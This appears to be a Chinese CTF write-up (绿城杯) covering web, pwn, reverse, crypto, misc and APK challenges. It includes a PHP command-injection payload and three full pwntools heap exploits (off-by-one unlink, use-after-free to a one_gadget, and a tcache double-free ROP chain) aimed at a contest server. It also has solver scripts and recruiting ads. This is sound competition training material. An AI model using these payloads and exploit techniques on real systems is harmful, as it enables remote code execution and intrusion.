绿城杯-WriteUp
Web
[warmup]ezphp
解题思路
git信息泄露
链接:https://pan.baidu.com/s/1vuw2ro56jZCtTBhW8N5e8g
提取码:1111
payload:?link_page=23%27)%20or%20eval(system("tac%20pages/flag.php"));%23
? ? ? ?
Pwn
null
解题思路
说是null 其实是off by one,基于uaf那题,这里直接试着打2.23,用的libc也是和uaf那题一样的
#?-*-?coding:?utf-8?-*-
from?pwn?import?*
elf=ELF('./1')
p=remote('82.157.5.28',51004)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
context(arch='amd64',?os='linux',?terminal=['tmux',?'splitw',?'-h'])
context.log_level='debug'
def?debug():
????gdb.attach(p)
????pause()
def?add(idx,size,con):
????p.recvuntil('Your?choice?:')
????p.sendline('1')
????p.recvuntil('Index:')
????p.sendline(str(idx))
????p.recvuntil('Size?of?Heap?:')
????p.sendline(str(size))
????p.recvuntil('Content?:')
????p.send(con)
def?delete(idx):
????p.recvuntil('Your?choice?:')
????p.sendline('2')
????p.recvuntil('Index:')
????p.sendline(str(idx))
def?edit(idx,con):
????p.recvuntil('Your?choice?:')
????p.sendline('3')
????p.recvuntil('Index:')
????p.sendline(str(idx))
????p.recvuntil('Content?:')
????p.send(con)
def?show(idx):
????p.recvuntil('Your?choice?:')
????p.sendline('4')
????p.recvuntil('Index?:')
????p.sendline(str(idx))
ptr=0x602120
add(0,0x48,'a')
add(1,0x80,'a')
add(2,0x80,'/bin/sh\x00')
fakechunk=p64(0)+p64(0x41)
fakechunk+=p64(ptr-0x18)+p64(ptr-0x10)
fakechunk+=0x20*'a'
fakechunk+=p64(0x40)+'\x90'
edit(0,fakechunk)
delete(1)
edit(0,0x18*'a'+p64(0x602120)+p64(0)+p64(elf.got['puts']))
show(2)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['puts']
print?hex(libc.address)
pause()
edit(0,p64(libc.sym['__free_hook']))
edit(0,p64(libc.sym['system']))
add(3,0x20,'/bin/sh\x00')
delete(3)
p.interactive()
ezuaf
解题思路
远程doublefree泄漏cfree后三位,配合mallochook地址通过libcdatabase确定2.23,然后打og
#?-*-?coding:?utf-8?-*-
from?pwn?import?*
#p=process('./1')
p=remote('82.157.5.28',51602)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
#p=process(['./1'],env={'LD_PRELOAD':'./libc-2.27_64.so'})
#libc=ELF('/glibc/2.23/64/lib/libc-2.23.so')
context(arch='amd64',?os='linux',?terminal=['tmux',?'splitw',?'-h'])
context.log_level='debug'
def?debug():
????gdb.attach(p)
????pause()
def?add(size):
????p.recvuntil('>')
????p.sendline('1')
????p.recvuntil('size>')
????p.sendline(str(size))
def?delete(idx):
????p.recvuntil('>')
????p.sendline('2')
????p.recvuntil('index>')
????p.sendline(str(idx))
def?edit(idx,con):
????p.recvuntil('>')
????p.sendline('3')
????p.recvuntil('index>')
????p.sendline(str(idx))
????p.recvuntil('content>')
????p.send(con)
def?show(idx):
????p.recvuntil('>')
????p.sendline('4')
????p.recvuntil('index>')
????p.sendline(str(idx))
#p.recvuntil('0x')
#addr=int(p.recv(12),16)
add(0x100)
add(0x68)
delete(0)
show(0)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
#p.interactive()
print?hex(libc.address)
delete(1)
edit(1,p64(libc.sym['__malloc_hook']-0x23))
add(0x68)
add(0x68)
og=[0x45226,0x4527a,0xf0364,0xf1207]
edit(3,'aaa'+p64(0)+p64(0)+p64(libc.address+og[0]))
add(0x10)
p.interactive()
W | GreentownNote | 解题做题人 题目说明 题目附件
解题思路 uaf
#!/usr/bin/env?python
#?-*-?coding:?utf-8?-*-
from?pwn?import?*
context.log_level?=?'debug'
context.arch?=?'amd64'
p?=?process('./GreentownNote')
libc?=?ELF("./libc-2.27.so")
p?=?remote("82.157.5.28",?51601)
def?add(size,?content="a"):
?p.sendlineafter("Your?choice?:",?"1")
?p.sendlineafter("size?:",?str(size))
?p.sendafter("Content?:",?content)
def?show(idx):
?p.sendlineafter("Your?choice?:",?"2")
?p.sendlineafter("ndex?:",?str(idx))
def?free(idx):
?p.sendlineafter("Your?choice?:",?"3")
?p.sendlineafter("ndex?:",?str(idx))
def?exp():
?add(0x3f0)#0
?add(0x400)#1
?add(0x3f0,?(p64(0)+p64(0x21))*8)#2
?free(0)
?free(0)
?free(0)
?free(0)
?show(0)
?p.recvuntil("Content:?")
?heap?=?u64(p.recv(6)+b"\x00"*2)
?print(hex(heap))
?add(0x3f0,?p64(heap+0x3f0))#3
?add(0x3f0)#4
?add(0x3f0,?p64(0)+p64(0x421))#5
?free(1)
?show(1)
?p.recvuntil("Content:?")
?libc.address?=?u64(p.recv(6)+b"\x00"*2)-0x7ffff7dcfca0+0x7ffff79e4000
?print(hex(libc.address))
?free(0)
?free(0)
?add(0x3f0,?p64(libc.sym["__free_hook"]))
?rop?=?[
??libc.address+0x000000000002155f,
??heap+0xb0,
??libc.address+0x0000000000023e6a,
??0,
??libc.sym['open'],
??libc.address+0x000000000002155f,
??3,
??libc.address+0x0000000000023e6a,
??heap+0x100,
??libc.address+0x0000000000001b96,
??0x30,
??libc.sym['read'],
??libc.address+0x000000000002155f,
??1,
??libc.address+0x0000000000023e6a,
??heap+0x100,
??libc.address+0x0000000000001b96,
??0x30,
??libc.sym['write']
?]
?payload?=?flat(rop).ljust(0xa0,?b"\x00")
?payload?+=?p64(heap+8)+p64(libc.address+0x000000000002155f)+b"flag"
?add(0x3f0,?payload)
?add(0x3f0,?p64(libc.sym["setcontext"]+53))
?free(0)
?#gdb.attach(p)
?
?p.interactive()
if?__name__?==?'__main__':
?exp()
'''
=>?0x7ffff7a360a5?<setcontext+53>:?mov????rsp,QWORD?PTR?[rdi+0xa0]
???0x7ffff7a360ac?<setcontext+60>:?mov????rbx,QWORD?PTR?[rdi+0x80]
???0x7ffff7a360b3?<setcontext+67>:?mov????rbp,QWORD?PTR?[rdi+0x78]
???0x7ffff7a360b7?<setcontext+71>:?mov????r12,QWORD?PTR?[rdi+0x48]
???0x7ffff7a360bb?<setcontext+75>:?mov????r13,QWORD?PTR?[rdi+0x50]
???0x7ffff7a360bf?<setcontext+79>:?mov????r14,QWORD?PTR?[rdi+0x58]
???0x7ffff7a360c3?<setcontext+83>:?mov????r15,QWORD?PTR?[rdi+0x60]
???0x7ffff7a360c7?<setcontext+87>:?mov????rcx,QWORD?PTR?[rdi+0xa8]
???0x7ffff7a360ce?<setcontext+94>:?push???rcx
???0x7ffff7a360cf?<setcontext+95>:?mov????rsi,QWORD?PTR?[rdi+0x70]
???0x7ffff7a360d3?<setcontext+99>:?mov????rdx,QWORD?PTR?[rdi+0x88]
???0x7ffff7a360da?<setcontext+106>:?mov????rcx,QWORD?PTR?[rdi+0x98]
???0x7ffff7a360e1?<setcontext+113>:?mov????r8,QWORD?PTR?[rdi+0x28]
???0x7ffff7a360e5?<setcontext+117>:?mov????r9,QWORD?PTR?[rdi+0x30]
???0x7ffff7a360e9?<setcontext+121>:?mov????rdi,QWORD?PTR?[rdi+0x68]
???0x7ffff7a360ed?<setcontext+125>:?xor????eax,eax
???0x7ffff7a360ef?<setcontext+127>:?ret??
'''
Reverse
抛石机
解题思路
最后是检查两个一元二次方程组,重点是程序将数字读取到了高8位,所以应该根据IEEE浮点标准进行变换,使符合要求
import?cmath
import?struct
from?zio?import?*
def?solve(a,?b,?c):
????d?=?(b?**?2)?-?(4?*?a?*?c)
????sol1?=?(-b?-?cmath.sqrt(d))?/?(2?*?a)
????sol2?=?(-b?+?cmath.sqrt(d))?/?(2?*?a)
????d1?=?(struct.pack('<d',?sol1.real))
????d2?=?(struct.pack('<d',?sol2.real))
????ret?=?[]
????for?v?in?[l32(d1[4:]),?l32(d2[4:])]:
????????for?i?in?range(2):
????????????v1?=?struct.unpack('<d',?'\x00'*4?+?l32(v+i))[0]
????????????fin?=?b?*?v1?+?v1?*?a?*?v1?+?c
????????????if?(fin?>?-0.00003)?&?(fin?<?0.00003):
????????????????ret.append(v+i)
????????????????break
????return?ret[0],?ret[1]
a1?=?-27.6
b1?=?149.2
c1?=?-129.0
a2?=?-39.6
b2?=?59.2
c2?=?37.8
ret0,?ret1?=?solve(a1,?b1,?c1)
ret2,?ret3?=?solve(a2,?b2,?c2)
s?=?[hex(ret1),?hex(ret0),?hex(ret3),?hex(ret2)]
print(s)
之后修改端序 ?得到flag为flag{454af13f-f84c-1140-1ee4-debf58a4ff3f}
[warmup]easy_re
解题思路
RC4,直接找到异或的数据和比较数据,下断点
? ? ? ?
写异或脚本直接得到flag
#include<stdio.h>?
int?main()?
{?
????????int?s1[]?=?{0x93,0xe0,0xec,0x83,0xe4,0xc6,0x1d,0x0,0x0,0x92,0xde,0xb5,0x12,0x84,0xf7,0x2d,0x56,0xb1,0x47,0xe2,0x69,0xb4,0x8a,0x95?
????????,0xba,0x72,0x62,0x8,0x93,0xf9,0xcc,0x2d,0xa9,0xe2,0xd0,0x65,0x4b,0x78,0x68,0x24,0xd7,0x91,0x6};?
????????int?s2[]?=?{0xF5,0x8C,0x8D,0xE4,0x9F,0xA5,0x28,0x65,0x30,0xF4,0xEB,0xD3,0x24,0xA9,0x91,0x1A?
????????????????,0x6F,0xD4,0x6A,0xD7,0x0B,0x8D,0xE8,0xB8,0x83,0x4A,0x5A,0x6E,0xBE,0xCB,0xF4,0x4B,0x99,0xD6,0xE6,0x54,0x7A,0x4F,0x50,0x14,0xE5,0xEC,0x8B};?
????????for(int?i=0;s2[i];i++)?
????????????????printf("%c",s1[i]^s2[i]);?
????????return?0;?
}?
//flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}
easy_vxworks
解题思路
IDA打开,搜索字符串找到主函数,去除花指令
sub_2450虽然长,但是可以推测出是找到指向第i个元素的指针,长度为一定字节
加密逻辑位于sub_330
int?__cdecl?sub_330(unsigned?int?a1,?int?a2)
{
??char?v3;?//?[esp+0h]?[ebp-14h]
??char?v4;?//?[esp+0h]?[ebp-14h]
??_BYTE?*v5;?//?[esp+4h]?[ebp-10h]
??_BYTE?*v6;?//?[esp+8h]?[ebp-Ch]
??if?(?!a2?)
????return?1;
??v6?=?(_BYTE?*)sub_2450((int)"C:/WindRiver/workspace/helloworld/helloworld.c",?10,?a1,?0,?1,?v3);
??*v6?^=?0x22u;
??v5?=?(_BYTE?*)sub_2450((int)"C:/WindRiver/workspace/helloworld/helloworld.c",?11,?a1,?0,?1,?v4);
??*v5?+=?3;
??return?sub_330(a1,?a2?-?1);
}
但是传入的v4参数不知道,可以穷举
c=[188,10,187,193,213,134,127,10,201,185,81,78,136,10,130,185,49,141,10,253,201,199,127,185,17,78,185,232,141,87]
t=30
def?decrypt(c,t):
????for?i?in?range(len(c)):
????????for?j?in?range(t):
????????????c[i]-=3
????????????c[i]=c[i]+0x100&0xff
????????????c[i]^=0x22
????#?print(bytes(c))
for?t?in?range(1024):
????d=[i?for?i?in?c]
????decrypt(d,t)
????j=0
????while?j<len(d):
????????if?d[j]<32?or?d[j]>128:
????????????break
????????j+=1
????if?j==len(d):print(bytes(d))
????#?print(t)
flag{helo_w0rld_W3lcome_70_R3}
Crypto
RSA-1
解题思路
import?gmpy2
import?libnum
n?=?17365231154926348364478276872558492775911760603002394353723603461898405740234715001820111548600914907617003806652492391686710256274156677887101997175692277729648456087534987616743724646598234466094779540729413583826355145277980479040157075453694250572316638348121571218759769533738721506811175866990851972838466307594226293836934116659685215775643285465895317755892754473332034234495795936183610569571016400535362762699517686781602302045048532131426035260878979892169441059467623523060569285570577199236309888155833013721997933960457784653262076135561769838704166810384309655788983073376941843467117256002645962737847
c?=?6944967108815437735428941286784119403138319713455732155925055928646536962597672941805831312130689338014913452081296400272862710447207265099750401657828165836013122848656839100854719965188680097375491193249127725599660383746827031803066026497989298856420216250206035068180963797454792151191071433645946245914916732637007117085199442894495667455544517483404006536607121480678688000420422281380539368519807162175099763891988648117937777951069899975260190018995834904541447562718307433906592021226666885638877020304005614450763081337082838608414756162253825697420493509914578546951634127502393647068722995363753321912676
p?=?gmpy2.gcd(n,?c)
q?=?n?//?p
e?=?65537
phi?=?(p-1)*(q-1)
d?=?gmpy2.invert(e,phi)
M?=?pow(c,?d,?n)
m?=?M?//?2021?//?1001?//?p
print(libnum.n2s(m))
#?flag{Math_1s_1nterest1ng_hah}
[warmup]加密算法
解题思路
直接把码表加密,之后按位找就行了
str1????=?'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def?encode(flag,?a,?b,?m):
????cipher_text?=?''
????for?i?in?flag:
????????if?i?in?str1:
????????????addr?=?str1.find(i)
????????????cipher_text?+=?str1[(a?*?addr?+?b)?%?m]
????????else:
????????????cipher_text?+=?i
????print(cipher_text)
????return?cipher_text
dec_charset?=?encode(str1,37,23,52)
cipher_text?=?'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
flag?=?""
for?i?in?cipher_text:
????if?i?in?str1:
????????addr?=?dec_charset.find(i)
????????flag?+=?str1[addr]
????else:
????????flag?+=?i
print(flag)
#?flag{AffInE_CIpheR_iS_clAssiC}
RSA2-PLUS
解题思路
https://jsur.in/post/2019-07-01-isitdtu-2019-quals-ctf-writeups
n1?=?6348779979606280884589422188738902470575876294643492831465947360363568026280963989291591157710389629216109615274754718329987990551836115660879103234129921943824061416396264358110216047994331119920503431491509529604742468032906950984256964560405062345280120526771439940278606226153077959057882262745273394986607004406770035459301695806378598890589432538916219821477777021460189140081521779103226953544426441823244765828342973086422949017937701261348963541035128661464068769033772390320426795044617751909787914185985911277628404632533530390761257251552073493697518547350246993679844132297414094727147161169548160586911
c1?=?6201882078995455673376327652982610102807874783073703018551044780440620679217833227711395689114659144506630609087600915116940111002026241056808189658969089532597757995423694966667948250438579639890580690392400661711864264184444018345499567505424672090632235109624193289954785503512742400960515331371813467034511130432319427185134018830006918682733848618201088649690422818940385123599468595766345668931882249779415788129316594083269412221804774856038796248038700275509397599351533280014908894068141056694660319816046357462684688942519849441237878018480036145051967731081582598773076490918572392784684372694103015244826
e?=?0x10001
#p2+q2?=?274773146761138462708137582309097386437793891793691383033856524303010811294101933454824485010521468914846151819876043508541879637544444256520741418495479393777132830985856522008561088410862815913292288683761657919121930016956916865849261153721097671315883469348972925757078089715102032241818526925988645578778
#q2*q2?=?18514724270030962172566965941723224386374076294232652258701085781018776172843355920566035157331579524980108190739141959926523082142273672741849552475156278397131571360099018592018959785627785130126477982765210498547680367230723634424036009539347854344573537848628061468892166199866227984167843139793429682559241317072979374002912607549039431398267184818771503468116379618249319324788996321340764624593443106354104274472601170229835219638093242557547840060892527576940077162990069687019966946826210112318408269749294366586682732614372434218768720577917368726530200897558912687470088583774711767599580037663378929000217
n2?=?40588227045595304080360385041082238507044292731344465815296032905633525556943787610712651675460810768762763493579129831271018141591546207557410817432455139315527674932933085299277599173971912445226532235814580879585317211349524406424200622675880992390782025158621241499693400288031658194434641718026910652327933253877313106112861283314274635124734817398465059373562194694957841264834312640926278890386089611103714990646541470577351599526904458342660444968591197606820361364761648205241041444681145820799054413179462285509661124362074093583494932706249461954240408827087015525507173082129412234486228092002841868365895837463699200959915782767657258729794037776401995309244941171415842403617486719492483671490834562579225506831496881542530519595438932482796867853234159664409420977526102480385193101883785161080269573707156626838551506024455480650224305894501968583442346807126920740779780593650871645915149689424292912611578291912721896864772950410266629045542480009266574096080138709683466489568290569363478444349563498507530805502511051165160827192795520182720802422213364247355775222858214648603034743679187470844212529134374975737510982287957316878179964602394749601431823167982157434890459245394370728942790117156485268116758052636794417268680901420193002289035538753620555488506926366624641291881353268617130968991258983002165300186971963661666476600998389048880565199317280428349802824448329898502788492233381873026217202981921654673840142095839603360666049476100561268336225902504932800605464136192275593886736746497955270280541423593
c2?=?25591090168544821761746024178724660839590948190451329227481168576490717242294520739865602061082558759751196452117720647426598261568572440942370039702932821941366792140173428488344932203576334292648255551171274828821657097667106792872200082579319963310503721435500623146012954474613150848083425126987554594651797477741828655238243550266972216752593788734836373144363217639612492397228808215205862281278774096317615918854403992620720969173788151215489908812749179861803144937169587452008097008940710091361183942268245271154461872102813602754439939747566507116519362821255724179093051041994730856401493996771276172343313045755916751082693149885922105491818225012844519264933137622929024918619477538521533548551789739698933067212305578480416163609137189891797209277557411169643568540392303036719952140554435338851671440952865151077383220305295001632816442144022437763089133141886924265774247290306669825085862351732336395617276100374237159580759999593028756939354840677333467281632435767033150052439262501059299035212928041546259933118564251119588970009016873855478556588250138969938599988198494567241172399453741709840486953189764289118312870580993115636710724139809708256360212728127786394411676427828431569046279687481368215137561500777480380501551616577832499521295655237360184159889151837766353116185320317774645294201044772828099074917077896631909654671612557207653830344897644115936322128351494551004652981550758791285434809816872381900401440743578104582305215488888563166054568802145921399726673752722820646807494657299104190123945675647
t1?=?79679231796035037354449627487236220201878797729093909877127396750043503300636464774059752126148617367251988043645511172901030621825575172979048675217345099706517900079260617448298874437193769061144201311929792287772928471712053565834702260975126852624433945451405258351557569670978748727663718174543709899747
t2?=?79679231796035037354449627487236220201878797729093909877127396750043503300636464774059752126148617367251988043645511172901030621825575172979048675217341753594180007984204016274224280609480494305040439035855109422239942522968468133274883986349646765947317076885918174299537297351936448296784166003890345486613?
from?gmpy2?import?iroot
from?Crypto.Util.number?import?isPrime
def?quadratic(a,?b,?c):
????try:
????????(d,?_)?=?iroot(b*b?-?(4*a*c),2)
????????return?((-b-d)//(2*a),?(-b+d)//(2*a))
????except:
????????return?0
for?(e,?d)?in?((e,?d)?for?e?in?range(1,?5000)?for?d?in?range(1,?5000)):
????q1?=?quadratic(e,?e*d+t1-t2,?-d*t2)
????if?q1?!=?0:
????????q1?=?q1[1]
????res?=?q1*q1*e?+?q1*(e*d+t1-t2)-d*t2
????if?res?==?0?and?isPrime(q1):
????????print(q1,?e,?d)
q?=?7502883888097212950622788817096216502912511795977786941568063923158816805073284550069689733527712330353018568842826730967449095687927404679782394052855569?
p1=?t2//q
from?gmpy2?import?next_prime
from?Crypto.Util.number?import?*
q1?=?next_prime(q)
p?=?t1//q1
phi1?=?(p-1)*(q-1)*(p1-1)*(q1-1)
d1?=?inverse(e,phi1)
m1?=?pow(c1,d1,n1)
print(long_to_bytes(m1))
#b'flag{Euler_funct1ons'
p2?=?156369362301683324125218204402965647844847700898336893807965993347521097936153209680438582412356886147490621941774361449543361003099855063903583735699989524930842868946568028125148569137321044967404135533563894823557903913169345053238064421472421305575401290009671355220416064671043038807885626965528792907041
q2?=?118403784459455138582919377906131738592946190895354489225890530955489713357948723774385902598164582767355529878101682058998518634444589192617157682795489868846289962039288493883412519273541770945888153150197763095564026103787571812611196732248676365740482179339301570536662025044058993433932899960459852671737
phi2?=?(p2-1)*p2*(q2-1)*(q2)*q2
n2?=?40588227045595304080360385041082238507044292731344465815296032905633525556943787610712651675460810768762763493579129831271018141591546207557410817432455139315527674932933085299277599173971912445226532235814580879585317211349524406424200622675880992390782025158621241499693400288031658194434641718026910652327933253877313106112861283314274635124734817398465059373562194694957841264834312640926278890386089611103714990646541470577351599526904458342660444968591197606820361364761648205241041444681145820799054413179462285509661124362074093583494932706249461954240408827087015525507173082129412234486228092002841868365895837463699200959915782767657258729794037776401995309244941171415842403617486719492483671490834562579225506831496881542530519595438932482796867853234159664409420977526102480385193101883785161080269573707156626838551506024455480650224305894501968583442346807126920740779780593650871645915149689424292912611578291912721896864772950410266629045542480009266574096080138709683466489568290569363478444349563498507530805502511051165160827192795520182720802422213364247355775222858214648603034743679187470844212529134374975737510982287957316878179964602394749601431823167982157434890459245394370728942790117156485268116758052636794417268680901420193002289035538753620555488506926366624641291881353268617130968991258983002165300186971963661666476600998389048880565199317280428349802824448329898502788492233381873026217202981921654673840142095839603360666049476100561268336225902504932800605464136192275593886736746497955270280541423593
c2?=?25591090168544821761746024178724660839590948190451329227481168576490717242294520739865602061082558759751196452117720647426598261568572440942370039702932821941366792140173428488344932203576334292648255551171274828821657097667106792872200082579319963310503721435500623146012954474613150848083425126987554594651797477741828655238243550266972216752593788734836373144363217639612492397228808215205862281278774096317615918854403992620720969173788151215489908812749179861803144937169587452008097008940710091361183942268245271154461872102813602754439939747566507116519362821255724179093051041994730856401493996771276172343313045755916751082693149885922105491818225012844519264933137622929024918619477538521533548551789739698933067212305578480416163609137189891797209277557411169643568540392303036719952140554435338851671440952865151077383220305295001632816442144022437763089133141886924265774247290306669825085862351732336395617276100374237159580759999593028756939354840677333467281632435767033150052439262501059299035212928041546259933118564251119588970009016873855478556588250138969938599988198494567241172399453741709840486953189764289118312870580993115636710724139809708256360212728127786394411676427828431569046279687481368215137561500777480380501551616577832499521295655237360184159889151837766353116185320317774645294201044772828099074917077896631909654671612557207653830344897644115936322128351494551004652981550758791285434809816872381900401440743578104582305215488888563166054568802145921399726673752722820646807494657299104190123945675647
e?=?0x10001
from?Crypto.Util.number?import?*
d2?=?inverse(e,phi2)
m2??=?pow(c2,d2,n2)
print(long_to_bytes(m2))
#?b'_1s_very_interst1ng}'
Misc
[warmup]音频隐写
解题思路
下载下来后是个wav,直接拖到AU看频谱图
? ? ? ?
flag{f8fbb2c761821d3af23858f721cc140b}
创新方向
APP逆向-clockin
解题思路
将apk文件解包进行patch,将not admin ?patch为admin
? ? ? ?
之后再进行签名,安装运行得到flag为 1cd8a8623acf512ea7a96c5305f1be9f
end
招新小广告
ChaMd5?Venom?招收大佬入圈
新成立组IOT+工控+样本分析?长期招新
欢迎联系admin@chamd5.org
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
Chamd5安全团队
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 习近平将发表二〇二六年新年贺词 7904141
- 2 2026年国补政策来了 7808738
- 3 东部战区:开火!开火!全部命中! 7712893
- 4 2026年这些民生政策将惠及百姓 7616985
- 5 小学食堂米线过期2.5小时被罚5万 7519709
- 6 解放军喊话驱离台军 原声曝光 7428214
- 7 为博流量直播踩烈士陵墓?绝不姑息 7327605
- 8 每月最高800元!多地发放养老消费券 7238391
- 9 数字人民币升级 1月1日起将计付利息 7141831
- 10 2026年1月1日起 一批新规将施行 7040675
